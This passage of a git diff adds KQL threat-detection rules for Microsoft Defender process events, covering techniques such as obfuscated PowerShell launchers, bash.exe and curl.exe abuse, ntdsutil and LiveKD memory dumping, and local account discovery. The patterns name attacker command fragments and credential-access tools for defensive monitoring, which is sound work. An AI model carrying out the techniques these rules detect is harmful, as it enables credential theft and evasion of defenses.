@@ -0,0 +1,10 @@
+// Title: Imports Registry Key From an ADS
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the import of a alternate datastream to the registry with regedit.exe.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql b/KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql
new file mode 100644
index 00000000..2a12c40e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/indirect_command_execution_by_program_compatibility_wizard.kql
@@ -0,0 +1,13 @@
+// Title: Indirect Command Execution By Program Compatibility Wizard
+// Author: A. Sungurov , oscd.community
+// Date: 2020-10-12
+// Level: low
+// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+//   - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts
+//   - Legit usage of scripts
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql b/KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql
new file mode 100644
index 00000000..2a87d7a5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/indirect_command_execution_from_script_file_via_bash_exe.kql
@@ -0,0 +1,11 @@
+// Title: Indirect Command Execution From Script File Via Bash.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-15
+// Level: medium
+// Description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.
+// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe") and (not(((ProcessCommandLine contains "bash.exe -" or ProcessCommandLine contains "bash -") or ProcessCommandLine =~ "" or isnull(ProcessCommandLine) or (ProcessCommandLine in~ ("bash.exe", "bash")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql b/KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql
new file mode 100644
index 00000000..6863b7f2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/indirect_inline_command_execution_via_bash_exe.kql
@@ -0,0 +1,11 @@
+// Title: Indirect Inline Command Execution Via Bash.EXE
+// Author: frack113
+// Date: 2021-11-24
+// Level: medium
+// Description: Detects execution of Microsoft bash launcher with the "-c" flag.
+// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -c " and ((FolderPath endswith ":\\Windows\\System32\\bash.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\bash.exe") or ProcessVersionInfoOriginalFileName =~ "Bash.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql b/KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql
new file mode 100644
index 00000000..7d8c5ca7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/infdefaultinstall_exe_inf_execution.kql
@@ -0,0 +1,10 @@
+// Title: InfDefaultInstall.exe .inf Execution
+// Author: frack113
+// Date: 2021-07-13
+// Level: medium
+// Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "InfDefaultInstall.exe " and ProcessCommandLine contains ".inf"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql b/KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql
new file mode 100644
index 00000000..81474161
--- /dev/null
+++ b/KQL/rules/windows/process_creation/insecure_proxy_doh_transfer_via_curl_exe.kql
@@ -0,0 +1,12 @@
+// Title: Insecure Proxy/DOH Transfer Via Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Access to badly maintained internal or development systems
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--doh-insecure" or ProcessCommandLine contains "--proxy-insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql b/KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql
new file mode 100644
index 00000000..1538d4d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/insecure_transfer_via_curl_exe.kql
@@ -0,0 +1,12 @@
+// Title: Insecure Transfer Via Curl.EXE
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-30
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "--insecure" flag.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Access to badly maintained internal or development systems
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql
new file mode 100644
index 00000000..ec6ce9a9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/insensitive_subfolder_search_via_findstr_exe.kql
@@ -0,0 +1,12 @@
+// Title: Insensitive Subfolder Search Via Findstr.EXE
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-05
+// Level: low
+// Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
+// False Positives:
+//   - Administrative or software activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -i " or ProcessCommandLine contains " /i " or ProcessCommandLine contains " –i " or ProcessCommandLine contains " —i " or ProcessCommandLine contains " ―i ") and (ProcessCommandLine contains " -s " or ProcessCommandLine contains " /s " or ProcessCommandLine contains " –s " or ProcessCommandLine contains " —s " or ProcessCommandLine contains " ―s "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql b/KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql
new file mode 100644
index 00000000..0d6d9293
--- /dev/null
+++ b/KQL/rules/windows/process_creation/install_new_package_via_winget_local_manifest.kql
@@ -0,0 +1,14 @@
+// Title: Install New Package Via Winget Local Manifest
+// Author: Sreeman, Florian Roth (Nextron Systems), frack113
+// Date: 2020-04-21
+// Level: medium
+// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
+// The manifest option enables you to install an application by passing in a YAML file directly to the client.
+// Winget can be used to download and install exe, msi or msix files later.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+//   - Some false positives are expected in some environment that may use this functionality to install and test their custom applications
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql b/KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql
new file mode 100644
index 00000000..79fa93de
--- /dev/null
+++ b/KQL/rules/windows/process_creation/installation_of_wsl_kali_linux.kql
@@ -0,0 +1,13 @@
+// Title: Installation of WSL Kali-Linux
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-10
+// Level: high
+// Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL).
+// Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Legitimate installation or usage of Kali Linux WSL by administrators or security teams
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl") and (ProcessCommandLine contains " --install " or ProcessCommandLine contains " -i ") and ProcessCommandLine contains "kali"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/interactive_at_job.kql b/KQL/rules/windows/process_creation/interactive_at_job.kql
new file mode 100644
index 00000000..0feaf4ea
--- /dev/null
+++ b/KQL/rules/windows/process_creation/interactive_at_job.kql
@@ -0,0 +1,12 @@
+// Title: Interactive AT Job
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.002
+// False Positives:
+//   - Unlikely (at.exe deprecated as of Windows 8)
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql b/KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql
new file mode 100644
index 00000000..4b71e6fc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/interesting_service_enumeration_via_sc_exe.kql
@@ -0,0 +1,11 @@
+// Title: Interesting Service Enumeration Via Sc.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-02-12
+// Level: low
+// Description: Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe".
+// Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "query" and ProcessCommandLine contains "termservice" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
new file mode 100644
index 00000000..b8ff3db6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invocation_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
@@ -0,0 +1,12 @@
+// Title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
+// Author: Thomas Patzke
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+//   - NTDS maintenance
+
+DeviceProcessEvents
+| where FolderPath endswith "\\ntdsutil.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql
new file mode 100644
index 00000000..d4bf3bbf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_clip_launcher.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation CLIP+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-13
+// Level: high
+// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql
new file mode 100644
index 00000000..1ecf0bba
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_compress_obfuscation.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation COMPRESS OBFUSCATION
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql
new file mode 100644
index 00000000..d5e8ee7d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_obfuscated_iex_invocation.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Obfuscated IEX Invocation
+// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
+// Date: 2019-11-08
+// Level: high
+// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql
new file mode 100644
index 00000000..f757d6cc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_stdin_launcher.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation STDIN+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-15
+// Level: high
+// Description: Detects Obfuscated use of stdin to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql
new file mode 100644
index 00000000..21843273
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation VAR+ Launcher
+// Author: Jonathan Cheong, oscd.community
+// Date: 2020-10-15
+// Level: high
+// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql
new file mode 100644
index 00000000..2a825bce
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_var_launcher_obfuscation.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2020-10-13
+// Level: high
+// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql
new file mode 100644
index 00000000..f7ba515b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_via_stdin.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Via Stdin
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects Obfuscated Powershell via Stdin in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql
new file mode 100644
index 00000000..c7f60be2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_clip.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Via Use Clip
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-09
+// Level: high
+// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql
new file mode 100644
index 00000000..230a5c07
--- /dev/null
+++ b/KQL/rules/windows/process_creation/invoke_obfuscation_via_use_mshta.kql
@@ -0,0 +1,10 @@
+// Title: Invoke-Obfuscation Via Use MSHTA
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-08
+// Level: high
+// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql b/KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql
new file mode 100644
index 00000000..adc88d42
--- /dev/null
+++ b/KQL/rules/windows/process_creation/java_running_with_remote_debugging.kql
@@ -0,0 +1,10 @@
+// Title: Java Running with Remote Debugging
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/jscript_compiler_execution.kql b/KQL/rules/windows/process_creation/jscript_compiler_execution.kql
new file mode 100644
index 00000000..a8c1cf13
--- /dev/null
+++ b/KQL/rules/windows/process_creation/jscript_compiler_execution.kql
@@ -0,0 +1,13 @@
+// Title: JScript Compiler Execution
+// Author: frack113
+// Date: 2022-05-02
+// Level: low
+// Description: Detects the execution of the "jsc.exe" (JScript Compiler).
+// Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+//   - Legitimate use to compile JScript by developers.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\jsc.exe" or ProcessVersionInfoOriginalFileName =~ "jsc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql b/KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql
new file mode 100644
index 00000000..90e5378a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/kavremover_dropped_binary_lolbin_usage.kql
@@ -0,0 +1,10 @@
+// Title: Kavremover Dropped Binary LOLBIN Usage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-01
+// Level: high
+// Description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " run run-cmd " and (not((InitiatingProcessFolderPath endswith "\\cleanapi.exe" or InitiatingProcessFolderPath endswith "\\kavremover.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql b/KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql
new file mode 100644
index 00000000..60eb710d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/kernel_memory_dump_via_livekd.kql
@@ -0,0 +1,12 @@
+// Title: Kernel Memory Dump Via LiveKD
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-16
+// Level: high
+// Description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Unlikely in production environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -m" or ProcessCommandLine contains " /m" or ProcessCommandLine contains " –m" or ProcessCommandLine contains " —m" or ProcessCommandLine contains " ―m") and ((FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql b/KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql
new file mode 100644
index 00000000..09cd1468
--- /dev/null
+++ b/KQL/rules/windows/process_creation/launch_vsdevshell_ps1_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: Launch-VsDevShell.PS1 Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216.001
+// False Positives:
+//   - Legitimate usage of the script by a developer
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "VsWherePath " or ProcessCommandLine contains "VsInstallationPath ") and ProcessCommandLine contains "Launch-VsDevShell.ps1"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql b/KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql
new file mode 100644
index 00000000..3e0f8ef2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/loaded_module_enumeration_via_tasklist_exe.kql
@@ -0,0 +1,12 @@
+// Title: Loaded Module Enumeration Via Tasklist.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-02-12
+// Level: medium
+// Description: Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe".
+// This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.
+// In order to dump the process memory or perform other nefarious actions.
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-m" or ProcessCommandLine contains "/m" or ProcessCommandLine contains "–m" or ProcessCommandLine contains "—m" or ProcessCommandLine contains "―m") and (FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe") and ProcessCommandLine contains "rdpcorets.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/local_accounts_discovery.kql b/KQL/rules/windows/process_creation/local_accounts_discovery.kql
new file mode 100644
index 00000000..fed49bcc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/local_accounts_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Local Accounts Discovery
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-21
+// Level: low
+// Description: Local accounts, System Owner/User discovery using operating systems utilities
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, attack.t1087.001
+// False Positives:
+//   - Legitimate administrator or user enumerates local users for legitimate reason
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or ((FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or (ProcessVersionInfoOriginalFileName in~ ("whoami.exe", "quser.exe", "qwinsta.exe"))) or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine contains "get") and FolderPath endswith "\\wmic.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql b/KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql
new file mode 100644
index 00000000..beab6efb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/local_file_read_using_curl_exe.kql
@@ -0,0 +1,10 @@
+// Title: Local File Read Using Curl.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..f663ee48
--- /dev/null
+++ b/KQL/rules/windows/process_creation/local_groups_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,13 @@
+// Title: Local Groups Reconnaissance Via Wmic.EXE
+// Author: frack113
